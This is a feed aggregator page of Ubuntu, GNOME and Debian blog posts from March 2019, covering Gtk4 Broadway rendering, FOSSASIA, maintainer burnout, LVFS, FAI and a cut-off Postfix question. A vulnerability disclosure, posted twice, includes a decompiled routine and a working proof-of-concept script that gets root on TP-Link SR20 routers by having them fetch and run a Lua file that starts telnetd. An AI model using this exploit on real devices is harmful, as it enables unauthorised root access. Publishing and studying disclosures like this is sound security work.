You are here

Agreguesi i feed

Full Circle Magazine: Full Circle Magazine #143

Planet Ubuntu - Pre, 29/03/2019 - 8:30md

This month:
* Command & Conquer
* How-To : Python, Freeplane, and Darktable
* Graphics : Inkscape
* Ubuntu Devices: OTA-8
* My Opinion: GDPR Pt3
* Linux Loopback: BSD
* Book Review: Practical Binary Analysis
* Interview: Simon Quigley (Lubuntu)
* Ubuntu Games: This Is The Police 2
plus: News, The Daily Waddle, Q&A, and more.

Get it while it’s hot: https://fullcirclemagazine.org/issue-143/

Alexander Larsson: Broadway adventures in Gtk4

Planet GNOME - Pre, 29/03/2019 - 4:20md

One of my long running side projects is a Gtk backend called “Broadway”. Instead of rendering to the screen this backend creates a HTTP server that you can connect to, and then exposes the UI remotely in the browser.

The original version of broadway was essentially streaming image frames, although there were various ways to optimize what got sent. This matches pretty well with how Gtk 3 rendering works, particularly on Wayland. Every frame it calls out to all widgets, letting them draw on top of a buffer and then sends the final frame to the compositor. Broadway just inserts some image delta computation and JavaScript magic in the middle of this.

Enter Gtk 4, breaking everything!

However, time moves on, and the current development branch of Gtk (which will be Gtk 4) has completely changed how rendering works, with the goal of doing efficient rendering on modern GPUs.

In the new model widgets don’t directly render to a buffer. Instead they build up a model of how the final result should look in terms of something called render nodes. These describe rendering as a tree of highlevel operations. The backend (we have software, OpenGL and Vulkan backends) then knows how to take this description and submit it to the GPU in an efficient way. This is somewhat similar to the firefox WebRender project.

Its would be possible to implement the broadway backend by hooking up the software renderer, letting it generate a buffer and then send that to the browser.  However, that is pretty lame!

CSS comes to the rescue!

Instead I’ve been looking at making the browser actually draw the render nodes. Gtk defines a lot of its UI in terms of CSS these days, and that means that the render nodes actually are very close to the CSS rendering model. For example, the basic drawing operation are things like rounded boxes with borders, shadows, etc.

So, I was thinking, could we not take these render node and turn them into actual DOM nodes with CSS styles and send them to the browser. Then every frame we can just diff the DOM trees, sending the minimal changes necessary.

Sounds crazy right? But, it turns out to work pretty well.

Check out this example page which I created with the magic of “save as”. In particular, try zooming into that page in the browser, and play with the developer tools inspector to see the nodes. Here is a part of it zoomed in:

The icons and the text are not CSS, so they don’t scale, but look at those gorgeous borders, shadows and gradients!

Entering the 3rd dimension!

Particularly interesting is the support in Gtk for general 3D transforms. This maps well to the CSS transform on the browser style.

Check out this example of a spinning-cube transition. If you open up the browser inspector you can see that each individual element in the cube is still a regular CSS box.

Some technical notes

If you look at the examples above they all use data: uris for images. This is a custom mode that lets “screenshots” like the above work. Normally broadway uses blobs for the images.

Also, looking at the examples they seem very heavy in terms of images, as all the text are images. However, in a typical frame most of the render tree is identical to the previous frame, meaning any label that was used in the last frame need not be sent again. In fact, even if it changes position in the tree due to a parent node changing (scrolling, cube-switching, etc) it can still be reused as-is.

However, text is clearly the weak point in here. Unfortunately HTML/CSS has no low-level text rendering APIs we could use. I’m considering generating a texture atlas with pre-rendered glyphs that can be reused (like CSS sprites) when rendering text, that would mean we will have to download less data at least. If anyone has other ideas I would love to hear about it.

Martin Michlmayr: FOSSASIA 2019 in Singapore

Planet Debian - Pre, 29/03/2019 - 8:42pd

I attended FOSSASIA earlier this month. This conference has been on my radar for many years but I never managed to attend before.

I was impressed by the organization of the conference. Furthermore, I liked that the audience was completely different to the conferences I normally attend. There were so many new people. FOSSASIA has grown not just to be a conference, but also an umbrella organization for several open source projects.

I gave a talk about open source culture, using Debian as an example. I find this type of presentation important because this is where a lot of pitfalls are for many new contributors. Learning technologies is easy, but figuring out all the unwritten norms and rules of a community can be daunting. Of course, it was particularly interesting to give this talk in an environment where I'm the cultural outsider. While I've visited a number of Asian countries, there's a lot about the different cultures I have yet to learn.

I met a number of Debian contributors, including Andrew Lee, Norbert Preining (who talked about TeX Live), Graham Williams (who used to contribute to Debian in the early days and heads an AI team at Microsoft in Singapore now), Kai Hendry (who used to contribute to Debian) and others. I also spent some time away from the conference to write my DPL platform.

Thank you to Hong Phuc Dang, Mario Behling and all the other organizers and volunteers for a wonderful event!

Kurt von Finck: Last post. I’m gone.

Planet Ubuntu - Pre, 29/03/2019 - 3:57pd

Last post. I’m gone.

https://reddit.com/r/ploos

https://pluspora.com

I’m “mneptok” just about everywhere. I’ll see you all in the next life, when we are all cats.

https://youtu.be/FqHIkkRrwcQ

Ubuntu Studio: Ubuntu Studio 19.04 (Disco Dingo) Beta Released

Planet Ubuntu - Pre, 29/03/2019 - 3:19pd
The Ubuntu Studio team is pleased to announce the beta release of Ubuntu Studio 19.04, codenamed Disco Dingo. While this beta is reasonably free of any showstopper CD build or installer bugs, you may find some bugs within. This image is, however, reasonably representative of what you will find when Ubuntu Studio 19.04 is released […]

Georges Basile Stavracas Neto: On Being a Free Software Maintainer

Planet GNOME - Pre, 29/03/2019 - 3:08pd

Year is 2013. I learn about a new, alpha-quality project called “GNOME Calendar.” Intriguing.

I like calendars.

“Cool, I’ll track that,” said my younger self. Heavy development was happening at the ui-rework branch. Every day, a few new commits. Pull, build, test. Except one day, no new commits. Nor the next day. Or week. Or month. Or year. I’m disappointed. Didn’t want that project to die. You know…

I like calendars.

“Nope. Not gonna happen,” also said my younger self. Clone, build, fix bugs, send patches. Maintainer’s interest in the project is renewed. We get a new icon, things get serious. We go to a new IRC room (!) and make the first public release of GNOME Calendar.

One year passes, it is now 2015. After contributing for more than a year, Erick made me the de facto GNOME Calendar maintainer ¹. A mix of positive emotions flows: proud of the achievement; excitement for being able to carry on with my ideas for the future of the application; fear, for the weight of the responsibility.

But heck, I am a free software maintainer now.

That was 4 years ago. Time passes, things happen, experience is built. Experience that differs from what I originally expected.

Being a free software maintainer is a funny place to find yourself in. Good things came from it. Bad things too. Also terrible. And weird.

Naturally, there is a strong sense of achievement when you, well, achieve maintainership of a project. Usually, getting there requires a large number of interactions during a long period of time. It means you are trusted. It means you are trustworthy. It means you are skilled enough.

It also usually means stronger community bonds. Getting to know excellent people, that know a lot and are willing to share and mentor and help, is a life-changing experience. There is a huge human value in being surrounded by great people.

For those of us who enjoy coding, hooray! Full plate. Planning releases, coding and doing reviews can be fun too. You will fix problems, find solutions, think and design your code. There is a plethora of problems to fix in this plane of existence, and you have the chance to independently fix a few of them by yourself.

And people. There are good people in this planet. You eventually will receive a thank you email, or you will be paid a coffee. One way or another, people find their way to you.

People really do find their way to you.

See, sometimes the software you maintain, well, it crashes. It may lose someone’s data. Someone may trigger a unique condition inside the code that you never managed to do. These people may get angry, sad, and frustrated ².

And they will find their way to you.

You will be demanded to fix your software. You will be shouted. Sometimes, the line may be crossed, and you will be abused. “How dare you not (use your free time to) fix this ultra high priority bug that is affecting me?” or “This is an absolutely basic feature! How is it not implemented yet (by you on your free time)?!” or even “You made me move to Software Y, and you need to win me back” are going to be realities you will have to face.

You may get emotional about your code. You may feel ashamed of what you did, and do. After all, your code has bugs, there are numerous issues opened at your bug tracker, and people are complaining non-stop. (Oh and, naturally, there will be someone who will try their best to put you down with that.)

At one point, you will look at your issue backlog and feel a subtle despair when realise you won’t ever be able to fix all the bugs.

If you are open to review other people’s contributions, there is a high change you will find challengers disguised as contributors. And your code review will be treated as an intellectual battle between good and evil. And you will need to explain and clarify over and over, and deal with circular logic, and pretty much any tool people might use to win battles instead of improving their code. And that is incredibly tiresome.

You will be told that you need to develop a thick skin. To ignore that, let it go, think positive and don’t pay attention to all the shit that is being thrown at you and why are you so goddamn negative you’re a maintainer for christ sake.

You may not feel the joy of working on what you work anymore. You may want to move on. You may also not do that due to the sense of responsibility that you have to your code, your community, and the people who use your software.

Unfortunately, being a free software maintainer may have a high price to your psychological and emotional health. 

Four years ago, I certainly did not know that.

¹ – And by “maintainer”, I am talking about being an upstream code maintainer, not package maintainer.
² – Rightfully so. Nobody wants to lose their stuff, or have their workflow broken.

Dirk Eddelbuettel: drat 0.1.5: New release

Planet Debian - Pre, 29/03/2019 - 2:34pd

A new version of drat just arrived on CRAN. And like the last time in December 2017 it went through as an automatically processed upgrade directly from the CRAN prechecks. Being a simple package can have its upsides…

And like the last time, this release once again draws largely upon contributed pull requests. Neal Fultz cleaned up how Windows paths are handled when inserting Windows (binary) packages. And Christoph Stepper extended the support for binary packages the helper commands pruneRepo and archivePackages. I added a minor cleanup to a test Neal added in the previous version, and that made a quick and simple release!

drat stands for drat R Archive Template, and helps with easy-to-create and easy-to-use repositories for R packages. Since its inception in early 2015 it has found reasonably widespread adoption among R users because repositories with marked releases is the better way to distribute code.

As your mother told you: Friends don’t let friends install random git commit snapshots. Rolled-up release it is. And despite what some (who may not know it well) say, drat is actually rather easy to use, documented by five vignettes and just works.

The NEWS file summarises the release as follows:

Changes in drat version 0.1.5 (2019-03-28)
  • Changes in drat functionality

    • Windows paths are handled better when inserting packages (Neal Fultz in #70)

    • Binary packages are now supported for the pruneRepo and archivePackages commands (Christoph Stepper in #79).

  • Changes in drat documentation

    • Properly prefix R path in system call in a tests (Dirk in minor cleanup to #70).

Courtesy of CRANberries, there is a comparison to the previous release. More detailed information is on the drat page.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

Matthew Garrett: Remote code execution as root from the local network on TP-Link SR20 routers

Planet GNOME - Enj, 28/03/2019 - 11:20md
The TP-Link SR20[1] is a combination Zigbee/ZWave hub and router, with a touchscreen for configuration and control. Firmware binaries are available here. If you download one and run it through binwalk, one of the things you find is an executable called tddp. Running arm-linux-gnu-nm -D against it shows that it imports popen(), which is generally a bad sign - popen() passes its argument directly to the shell, so if there's any way to get user controlled input into a popen() call you're basically guaranteed victory. That flagged it as something worth looking at, but in the end what I found was far funnier.

Tddp is the TP-Link Device Debug Protocol. It runs on most TP-Link devices in one form or another, but different devices have different functionality. What is common is the protocol, which has been previously described. The interesting thing is that while version 2 of the protocol is authenticated and requires knowledge of the admin password on the router, version 1 is unauthenticated.

Dumping tddp into Ghidra makes it pretty easy to find a function that calls recvfrom(), the call that copies information from a network socket. It looks at the first byte of the packet and uses this to determine which protocol is in use, and passes the packet on to a different dispatcher depending on the protocol version. For version 1, the dispatcher just looks at the second byte of the packet and calls a different function depending on its value. 0x31 is CMD_FTEST_CONFIG, and this is where things get super fun.

Here's a cut down decompilation of the function:
int ftest_config(char *byte) { int lua_State; char *remote_address; int err; int luaerr; char filename[64] char configFile[64]; char luaFile[64]; int attempts; char *payload; attempts = 4; memset(luaFile,0,0x40); memset(configFile,0,0x40); memset(filename,0,0x40); lua_State = luaL_newstart(); payload = iParm1 + 0xb027; if (payload != 0x00) { sscanf(payload,"%[^;];%s",luaFile,configFile); if ((luaFile[0] == 0) || (configFile[0] == 0)) { printf("[%s():%d] luaFile or configFile len error.\n","tddp_cmd_configSet",0x22b); } else { remote_address = inet_ntoa(*(in_addr *)(iParm1 + 4)); tddp_execCmd("cd /tmp;tftp -gr %s %s &",luaFile,remote_address); sprintf(filename,"/tmp/%s",luaFile); while (0 < attempts) { sleep(1); err = access(filename,0); if (err == 0) break; attempts = attempts + -1; } if (attempts == 0) { printf("[%s():%d] lua file [%s] don\'t exsit.\n","tddp_cmd_configSet",0x23e,filename); } else { if (lua_State != 0) { luaL_openlibs(lua_State); luaerr = luaL_loadfile(lua_State,filename); if (luaerr == 0) { luaerr = lua_pcall(lua_State,0,0xffffffff,0); } lua_getfield(lua_State,0xffffd8ee,"config_test",luaerr); lua_pushstring(lua_State,configFile); lua_pushstring(lua_State,remote_address); lua_call(lua_State,2,1); } lua_close(lua_State); } } } } Basically, this function parses the packet for a payload containing two strings separated by a semicolon. The first string is a filename, the second a configfile. It then calls tddp_execCmd("cd /tmp; tftp -gr %s %s &",luaFile,remote_address) which executes the tftp command in the background. This connects back to the machine that sent the command and attempts to download a file via tftp corresponding to the filename it sent. The main tddp process waits up to 4 seconds for the file to appear - once it does, it loads the file into a Lua interpreter it initialised earlier, and calls the function config_test() with the name of the config file and the remote address as arguments. Since config_test() is provided by the file that was downloaded from the remote machine, this gives arbitrary code execution in the interpreter, which includes the os.execute method which just runs commands on the host. Since tddp is running as root, you get arbitrary command execution as root.

I reported this to TP-Link in December via their security disclosure form, a process that was made difficult by the "Detailed description" field being limited to 500 characters. The page informed me that I'd hear back within three business days - a couple of weeks later, with no response, I tweeted at them asking for a contact and heard nothing back. Someone else's attempt to report tddp vulnerabilities had a similar outcome, so here we are.

There's a couple of morals here:
  • Don't default to running debug daemons on production firmware seriously how hard is this
  • If you're going to have a security disclosure form, read it


Proof of concept:#!/usr/bin/python3 # Copyright 2019 Google LLC. # SPDX-License-Identifier: Apache-2.0 # Create a file in your tftp directory with the following contents: # #function config_test(config) # os.execute("telnetd -l /bin/login.sh") #end # # Execute script as poc.py remoteaddr filename import binascii import socket port_send = 1040 port_receive = 61000 tddp_ver = "01" tddp_command = "31" tddp_req = "01" tddp_reply = "00" tddp_padding = "%0.16X" % 00 tddp_packet = "".join([tddp_ver, tddp_command, tddp_req, tddp_reply, tddp_padding]) sock_receive = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock_receive.bind(('', port_receive)) # Send a request sock_send = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) packet = binascii.unhexlify(tddp_packet) argument = "%s;arbitrary" % sys.argv[2] packet = packet + argument.encode() sock_send.sendto(packet, (sys.argv[1], port_send)) sock_send.close() response, addr = sock_receive.recvfrom(1024) r = response.encode('hex') print(r)
[1] Link to the wayback machine because the live link now redirects to an Amazon product page for a lightswitch

comments

Matthew Garrett: Remote code execution as root from the local network on TP-Link SR20 routers

Planet Debian - Enj, 28/03/2019 - 11:18md
The TP-Link SR20[1] is a combination Zigbee/ZWave hub and router, with a touchscreen for configuration and control. Firmware binaries are available here. If you download one and run it through binwalk, one of the things you find is an executable called tddp. Running arm-linux-gnu-nm -D against it shows that it imports popen(), which is generally a bad sign - popen() passes its argument directly to the shell, so if there's any way to get user controlled input into a popen() call you're basically guaranteed victory. That flagged it as something worth looking at, but in the end what I found was far funnier.

Tddp is the TP-Link Device Debug Protocol. It runs on most TP-Link devices in one form or another, but different devices have different functionality. What is common is the protocol, which has been previously described. The interesting thing is that while version 2 of the protocol is authenticated and requires knowledge of the admin password on the router, version 1 is unauthenticated.

Dumping tddp into Ghidra makes it pretty easy to find a function that calls recvfrom(), the call that copies information from a network socket. It looks at the first byte of the packet and uses this to determine which protocol is in use, and passes the packet on to a different dispatcher depending on the protocol version. For version 1, the dispatcher just looks at the second byte of the packet and calls a different function depending on its value. 0x31 is CMD_FTEST_CONFIG, and this is where things get super fun.

Here's a cut down decompilation of the function:
int ftest_config(char *byte) { int lua_State; char *remote_address; int err; int luaerr; char filename[64] char configFile[64]; char luaFile[64]; int attempts; char *payload; attempts = 4; memset(luaFile,0,0x40); memset(configFile,0,0x40); memset(filename,0,0x40); lua_State = luaL_newstart(); payload = iParm1 + 0xb027; if (payload != 0x00) { sscanf(payload,"%[^;];%s",luaFile,configFile); if ((luaFile[0] == 0) || (configFile[0] == 0)) { printf("[%s():%d] luaFile or configFile len error.\n","tddp_cmd_configSet",0x22b); } else { remote_address = inet_ntoa(*(in_addr *)(iParm1 + 4)); tddp_execCmd("cd /tmp;tftp -gr %s %s &",luaFile,remote_address); sprintf(filename,"/tmp/%s",luaFile); while (0 < attempts) { sleep(1); err = access(filename,0); if (err == 0) break; attempts = attempts + -1; } if (attempts == 0) { printf("[%s():%d] lua file [%s] don\'t exsit.\n","tddp_cmd_configSet",0x23e,filename); } else { if (lua_State != 0) { luaL_openlibs(lua_State); luaerr = luaL_loadfile(lua_State,filename); if (luaerr == 0) { luaerr = lua_pcall(lua_State,0,0xffffffff,0); } lua_getfield(lua_State,0xffffd8ee,"config_test",luaerr); lua_pushstring(lua_State,configFile); lua_pushstring(lua_State,remote_address); lua_call(lua_State,2,1); } lua_close(lua_State); } } } } Basically, this function parses the packet for a payload containing two strings separated by a semicolon. The first string is a filename, the second a configfile. It then calls tddp_execCmd("cd /tmp; tftp -gr %s %s &",luaFile,remote_address) which executes the tftp command in the background. This connects back to the machine that sent the command and attempts to download a file via tftp corresponding to the filename it sent. The main tddp process waits up to 4 seconds for the file to appear - once it does, it loads the file into a Lua interpreter it initialised earlier, and calls the function config_test() with the name of the config file and the remote address as arguments. Since config_test() is provided by the file that was downloaded from the remote machine, this gives arbitrary code execution in the interpreter, which includes the os.execute method which just runs commands on the host. Since tddp is running as root, you get arbitrary command execution as root.

I reported this to TP-Link in December via their security disclosure form, a process that was made difficult by the "Detailed description" field being limited to 500 characters. The page informed me that I'd hear back within three business days - a couple of weeks later, with no response, I tweeted at them asking for a contact and heard nothing back. Someone else's attempt to report tddp vulnerabilities had a similar outcome, so here we are.

There's a couple of morals here:
  • Don't default to running debug daemons on production firmware seriously how hard is this
  • If you're going to have a security disclosure form, read it


Proof of concept:#!/usr/bin/python3 # Copyright 2019 Google LLC. # SPDX-License-Identifier: Apache-2.0 # Create a file in your tftp directory with the following contents: # #function config_test(config) # os.execute("telnetd -l /bin/login.sh") #end # # Execute script as poc.py remoteaddr filename import binascii import socket port_send = 1040 port_receive = 61000 tddp_ver = "01" tddp_command = "31" tddp_req = "01" tddp_reply = "00" tddp_padding = "%0.16X" % 00 tddp_packet = "".join([tddp_ver, tddp_command, tddp_req, tddp_reply, tddp_padding]) sock_receive = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock_receive.bind(('', port_receive)) # Send a request sock_send = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) packet = binascii.unhexlify(tddp_packet) argument = "%s;arbitrary" % sys.argv[2] packet = packet + argument.encode() sock_send.sendto(packet, (sys.argv[1], port_send)) sock_send.close() response, addr = sock_receive.recvfrom(1024) r = response.encode('hex') print(r)
[1] Link to the wayback machine because the live link now redirects to an Amazon product page for a lightswitch

comments

Jonathan Carter: Fun and Debian

Planet Debian - Enj, 28/03/2019 - 6:57md

Brief background

When I started working on my DPL platform, I read through some platforms of recent years. Many of them made some mention of either making Debian a more fun project to contribute to, or keeping it so, even to the point where it has been considered a cliché. Recently, Lucas Nussbaum (DPL between 2013 and 2015), posted a list of DPL roles as he sees it, listing “Keep Debian fun and functional” as responsibility #0, so we know that it’s generally expected from the DPL to help make Debian a good project to be part of and contribute to.

In Marga’s platform that I linked above, she delves into what exactly “more fun” would mean. Oddly enough, few platforms which mentions ‘making Debian fun’ as a goal actually do that, which is also why I chose to be more specific in my platform about changes that I’d like to promote instead of just using a blanket term such as “make Debian more fun”.

Keeping employees engaged

The image below has been making rounds on the Internet for a long time, I couldn’t find it’s original source, but I think it’s still a great high-level summary of things that a company should keep in mind to keep their employees engaged and maintain a good relationship.

If you’re having trouble reading that, it says:

Employees stay engaged when they are:

  • Paid well
  • Mentored
  • Challenged
  • Promoted
  • Involved
  • Appreciated
  • Valued
  • On a Mission
  • Empowered
  • Trusted

Plenty of other platforms touched on some of these over the years. So I wondered… what would an ideal “Debian contributors stay when…” infographic look like?

Keeping and making fun in Debian

What’s great about the average Debian contributor is that they already want to be part of Debian. We don’t have to spend as much time as a commercial company does to incentivise a person to be part of the project. So I think in many ways, keeping Debian fun mostly involves removing bad obstacles/blockers and allowing a contributor to do their work with the least amount of friction. Having said that, I also believe that there is scope for making fun, that is, actively doing things that are enjoyable and that may attract more contributors.

Originally, I was going to write a loooooooooooooong piece on this and then make a graphic based on it, and around an hour in to it, around half way done, I realised it’s just going to be way too long and abandoned it in favour of going straight to the graphic.

So here goes, I call it version 0.0 of a Debian Fun Statement.

If you read DPL platforms this year and previous years, you’ll certainly recognise some elements from it. It reads:

In Debian, we’re having fun when:

  • we’re doing valuable work
  • we’re proud to be associated with the project
  • we’re feeling safe
  • we have opportunities to learn and grow
  • we figure out how to work out our differences
  • we work together on solutions
  • we’re efficient at making decisions
  • we’re getting things done
  • we’re sharing our knowledge with others
  • we feel appreciated
  • we feel understood
  • we feel included

I referred to it as a Debian Fun Statement and not the Debian Fun Statement, because I hastily put it together myself, it’s not official in any way at all. I think it might be worth while for us as a community to put together some nice final wording and for someone with graphic skills to do some nice layout/artwork.

As part of my campaign running for DPL, I want to let Debianites know that I plan towards making all of the above count for every Debian contributor. I tried to encode that as much as possible in to my platform, and hope that it comes across that way when you read it. Feedback is always welcome, thanks for reading!

Thomas Lange: New FAI version and ISO images

Planet Debian - Enj, 28/03/2019 - 5:42md

The new version FAI is available in two variants. FAI 5.8.4 is for Debian buster and FAI 5.8.4~bpo9+2 is the same for the stable distribution called stretch, including the configs for stretch.

You can get the packages when adding one of these lines to your sources.list:

deb https://fai-project.org/download stretch koeln

or

deb https://fai-project.org/download buster koeln

New FAI ISO images using stretch are now available from [1]. The FAIme build service [2] for customized cloud and installation images also uses the newest FAI versions.

[1] https://fai-project.org/fai-cd/

[2] https://fai-project.org/FAIme

FAI

Richard Hughes: New AppStream Validation Requirements

Planet GNOME - Enj, 28/03/2019 - 5:36md

In the next release of appstream-glib the appstream-util validate requirements got changed, which might make your life easier, or harder — depending if you already pass or fail the validation. The details are here but the rough jist is that we’ve relaxed a lot of the style rules (e.g. starts with a capital letter, ends with a full stop, less than a certain number of chars, etc), and made stricter some of the more important optional parts of the specification. For instance, requiring <content_rating> for any desktop or console application.

Even if you don’t care upstream, the new validation will soon be turned on for any apps built in Flathub, and downstream “packagers” will be pestering you for details as updates are now failing. Although only a few apps fail, some of the missing metadata tags are important enough to fail building. To test your app right now with the new validator:

$ flatpak remote-add --if-not-exists gnome-nightly https://sdk.gnome.org/gnome-nightly.flatpakrepo $ flatpak install gnome-nightly org.gnome.Sdk $ flatpak run --command=bash --filesystem=home:ro org.gnome.Sdk//master # appstream-util validate /home/hughsie/Code/gnome-software/data/appdata/org.gnome.Software.appdata.xml.in # exit

Of course, when the next tarball is released it’ll be available in your distribution as normal, but I wanted to get some early sanity checks in before I tag the release.

Christian Schaller: LVFS adopted by Linux Foundation

Planet GNOME - Enj, 28/03/2019 - 3:50md

Today the announcement went out that the Linux Vendor Firmware Service has become and official Linux Foundation service. For those that don’t know it yet LVFS is a service that provides firmware for your linux running hardware and it was one off our initial efforts as part of the Fedora Workstation effort to drain the swamp in terms of making Linux a first class desktop operating system.

The effort came about due to Peter Jones, who is Red Hats representative to the UEFI standards body, approaching me to talk about how Microsoft was trying to push for a standardized way to ship UEFI firmware for Windows and how UEFI being a standard openeded a path for us to actually get full support for this without each vendor having to ship and maintain their own proprietary firmware tools. So we did a meeting with Peter Jones and also brought in Richard Hughes who had already been looking at the problem of firmware updates in Linux, partly due to his ColorHug hardware, and the effort got started with Peter working on the low level OS tooling and Richard taking on building the service to drive distribution and the work to integrate it all into GNOME Software. One concern we had of course was if we could reach critical mass for this and get vendors interested, but luckily Dell was just as keen on improving firmware handling under Linux as us and signed on from the start. Having Dell onboard helped give the effort a lot of credibility and as the service matured we ended up having more and more vendors sign up. We also reached out through Red Hats partnerships to push vendors to adopt supporting it. As Richard also mentions in his interview about it, we had made the solution as similar to Microsofts as possible to decrease the threshold for hardware vendors to join, the goal being that if they did the basic work to support Windows they could more or less just ship the same firmware file to LVFS.

One issue that we had gone back on forth about inside Red Hat was the formal setup of the service. While we all agreed the service was hugely beneficial it felt like something that should be a shared service for all of Linux and we felt that if the service was Red Hat provided it might dissuade other vendors to join. So we started looking around for a neutral place to land the service while in the meantime LVFS had a sort of autonomous status being run as a community effort by Richard Hughes. We ended up talking to Chris Wright, the Red Hat CTO, about the project and he offered to facilitate contact with the Linux Foundation. The initial meetings was very positive and the Linux Foundation seemed interested in running the service right from the start, it did end up taking us quite some time to clear all formal and technical hurdles to get there, but I for one is very happy to see the LVFS now being a vendor neutral service provided by the Linux Foundation.

So a big thank you to Richard Hughes, Peter Jones, Chris Wright, Mario Limonciello and Dell and the Linux Foundation for their help in getting us here. And also a big thank you to Fedora and the Fedora community for their help with providing us a place to develop and polish up this service to the benefit of all. To me this is one of many examples of how Fedora keeps innovating and leading the way on Desktop linux.

Ismael Olea: Postfix: Name service error for name=domain.com type=MX: Host not found, try again

Planet GNOME - Enj, 28/03/2019 - 3:26md

I tried to post this in Serverfault but I couldn’t since it’s blocked by their spam detector.

Here is the full text of my question:

Hi:

I’m stuck with a Postfix MX related problem.

I’ve just migrated a very old Centos 5 server to v7 so I’m using postfix-2.10.1-7.el7.x86_64. I’ve upgraded the legacy postfix configuration (maybe the cause of this hell) and other supplementary stuff which seems to work:

  • postfix-perl-scripts-2.10.1-7.el7.x86_64
  • postgrey-1.34-12.el7.noarch
  • amavisd-new-2.11.1-1.el7.noarch
  • spamassassin-3.4.0-4.el7_5.x86_64
  • perl-Mail-SPF-2.8.0-4.el7.noarch
  • perl-Mail-DKIM-0.39-8.el7.noarch
  • dovecot-2.2.36-3.el7.x86_64

After many tribulations I think I got most of the system running except the annoying MX related problems, as (from /var/log/maillog):

Mar 28 14:26:48 tormento postfix/smtpd[1021]: warning: Unable to look up MX host for spmailtechn.com: Host not found, try again Mar 28 14:26:51 tormento postfix/smtpd[1052]: warning: Unable to look up MX host for inlumine.ual.es: Host not found, try again Mar 28 14:31:38 tormento postfix/smtpd[1442]: warning: Unable to look up MX host for aol.com: Host not found, try again Mar 28 13:07:53 tormento postfix/smtpd[26556]: warning: Unable to look up MX host for hotmail.com: Host not found, try again Mar 28 13:12:06 tormento postfix/smtpd[26650]: warning: Unable to look up MX host for facebookmail.com: Host not found, try again Mar 28 13:12:31 tormento postfix/smtpd[26650]: warning: Unable to look up MX host for joker.com: Host not found, try again Mar 28 13:13:02 tormento postfix/smtpd[26650]: warning: Unable to look up MX host for bounce.linkedin.com: Host not found, try again

and:

Mar 28 14:50:36 tormento postfix/smtp[1700]: 7B6C69C6A2: to=<ismael.olea@gmail.com>, orig_to=<ismael@olea.org>, relay=none, delay=1142, delays=1142/0.07/0/0, dsn=4.4.3, status=deferred (Host or domain name not found. Name service error for name=gmail.com type=MX: Host not found, try again) Mar 28 14:32:05 tormento postfix/smtp[1383]: 721A19C688: to=<XXXXX@yahoo.com>, orig_to=<XXXX@olea.org>, relay=none, delay=4742, delays=4742/0/0/0, dsn=4.4.3, status=deferred (Host or domain name not found. Name service error for name=yahoo.com type=MX: Host not found, try again)

as examples.

The first suspect is DNS resolution but this is working both using Hetztner DNS servers (where machine is host) or 8.8.8.8 or 9.9.9.9:

$ dig mx gmail.com ; <<>> DiG 9.9.4-RedHat-9.9.4-73.el7_6 <<>> mx gmail.com ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 20330 ;; flags: qr rd ra; QUERY: 1, ANSWER: 5, AUTHORITY: 0, ADDITIONAL: 1 ;; OPT PSEUDOSECTION: ; EDNS: version: 0, flags:; udp: 4096 ;; QUESTION SECTION: ;gmail.com. IN MX ;; ANSWER SECTION: gmail.com. 3014 IN MX 10 alt1.gmail-smtp-in.l.google.com. gmail.com. 3014 IN MX 5 gmail-smtp-in.l.google.com. gmail.com. 3014 IN MX 40 alt4.gmail-smtp-in.l.google.com. gmail.com. 3014 IN MX 20 alt2.gmail-smtp-in.l.google.com. gmail.com. 3014 IN MX 30 alt3.gmail-smtp-in.l.google.com. ;; Query time: 1 msec ;; SERVER: 213.133.100.100#53(213.133.100.100) ;; WHEN: jue mar 28 14:56:00 CET 2019 ;; MSG SIZE rcvd: 161

or:

dig mx inlumine.ual.es ; <<>> DiG 9.9.4-RedHat-9.9.4-73.el7_6 <<>> mx inlumine.ual.es ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 38239 ;; flags: qr rd ra; QUERY: 1, ANSWER: 5, AUTHORITY: 2, ADDITIONAL: 1 ;; OPT PSEUDOSECTION: ; EDNS: version: 0, flags:; udp: 4096 ;; QUESTION SECTION: ;inlumine.ual.es. IN MX ;; ANSWER SECTION: inlumine.ual.es. 172800 IN MX 1 ASPMX.L.GOOGLE.COM. inlumine.ual.es. 172800 IN MX 10 ASPMX3.GOOGLEMAIL.COM. inlumine.ual.es. 172800 IN MX 10 ASPMX2.GOOGLEMAIL.COM. inlumine.ual.es. 172800 IN MX 5 ALT1.ASPMX.L.GOOGLE.COM. inlumine.ual.es. 172800 IN MX 5 ALT2.ASPMX.L.GOOGLE.COM. ;; AUTHORITY SECTION: inlumine.ual.es. 172800 IN NS dns.ual.es. inlumine.ual.es. 172800 IN NS alboran.ual.es. ;; Query time: 113 msec ;; SERVER: 213.133.100.100#53(213.133.100.100) ;; WHEN: jue mar 28 14:56:51 CET 2019 ;; MSG SIZE rcvd: 217

my main.cf:

$ postconf -n address_verify_sender = postmaster@olea.org alias_database = hash:/etc/aliases alias_maps = hash:/etc/aliases body_checks = regexp:/etc/postfix/body_checks.regexp broken_sasl_auth_clients = yes canonical_maps = hash:/etc/postfix/canonical command_directory = /usr/sbin config_directory = /etc/postfix content_filter = smtp-amavis:[127.0.0.1]:10024 daemon_directory = /usr/libexec/postfix data_directory = /var/lib/postfix debug_peer_level = 2 debugger_command = PATH=/bin:/usr/bin:/usr/local/bin:/usr/X11R6/bin ddd $daemon_directory/$process_name $process_id & sleep 5 header_checks = pcre:/etc/postfix/header_checks.pcre home_mailbox = Maildir/ html_directory = no inet_interfaces = all inet_protocols = ipv4 local_recipient_maps = proxy:unix:passwd.byname $alias_maps mail_owner = postfix mailbox_command = /usr/bin/procmail -a "$EXTENSION" mailbox_size_limit = 200000000 mailq_path = /usr/bin/mailq.postfix manpage_directory = /usr/share/man message_size_limit = 30000000 mydestination = $myhostname, localhost.$mydomain, localhost, $mydomain, tormento.olea.org, /etc/postfix/localdomains myhostname = tormento.olea.org newaliases_path = /usr/bin/newaliases.postfix policy_time_limit = 3600 queue_directory = /var/spool/postfix readme_directory = /usr/share/doc/postfix-2.10.1/README_FILES recipient_delimiter = + sample_directory = /usr/share/doc/postfix-2.10.1/samples sendmail_path = /usr/sbin/sendmail.postfix setgid_group = postdrop smtp_tls_cert_file 